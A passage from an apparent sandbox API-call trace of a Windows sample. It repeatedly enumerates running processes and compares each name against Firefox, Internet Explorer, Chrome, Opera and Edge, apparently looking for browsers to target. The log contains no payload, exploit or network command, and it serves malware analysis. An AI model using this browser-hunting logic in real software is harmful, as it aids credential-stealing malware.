lpString2="microsoftedgecp.exe") returned 1 [0253.915] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0253.915] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0253.916] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0253.916] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0253.916] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0253.916] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.916] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0253.916] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0253.916] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0253.916] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0253.916] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0253.916] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.916] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.917] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.917] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.917] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.917] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0253.917] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0253.917] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0253.917] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0253.917] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0253.917] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0253.917] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0253.917] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.918] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.918] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.919] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0253.919] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.919] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0253.920] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0253.920] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0253.920] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0253.920] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0253.920] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0253.920] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0253.920] CloseHandle (hObject=0xe8) returned 1 [0253.920] Sleep (dwMilliseconds=0x3e8) [0254.929] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0254.930] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0254.931] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0254.931] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0254.931] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0254.931] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0254.931] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0254.931] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0254.931] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0254.931] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0254.931] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0254.931] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0254.932] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0254.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0254.932] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0254.932] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0254.932] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0254.932] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0254.932] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.932] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.933] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0254.933] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0254.933] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.933] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0254.933] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0254.933] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0254.933] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0254.933] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0254.933] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0254.933] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.933] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0254.934] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0254.934] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0254.934] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0254.934] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0254.934] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0254.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0254.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0254.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0254.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0254.934] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.934] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0254.935] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0254.935] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0254.935] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0254.935] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0254.935] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.935] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0254.935] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0254.935] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0254.936] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0254.936] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0254.936] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0254.936] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0254.936] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0254.936] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0254.936] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0254.936] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.936] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.937] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.937] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.938] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.938] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.939] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.939] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0254.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0254.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0254.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0254.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0254.940] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.940] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.940] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.940] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.940] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.940] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.940] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.941] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.941] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.941] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.941] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.941] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0254.941] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0254.941] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0254.941] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0254.941] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0254.941] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.941] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0254.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0254.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0254.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0254.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0254.942] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.942] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0254.942] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0254.942] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0254.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0254.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0254.943] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0254.943] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0254.943] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0254.943] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0254.943] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0254.943] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.943] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0254.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0254.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0254.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0254.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0254.944] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.944] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0254.944] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0254.944] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0254.944] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0254.944] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0254.945] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0254.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0254.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0254.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0254.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0254.945] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.945] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0254.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0254.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0254.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0254.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0254.946] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0254.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0254.946] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0254.946] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0254.946] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0254.946] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0254.946] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.946] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0254.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0254.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0254.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0254.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0254.947] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0254.947] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, 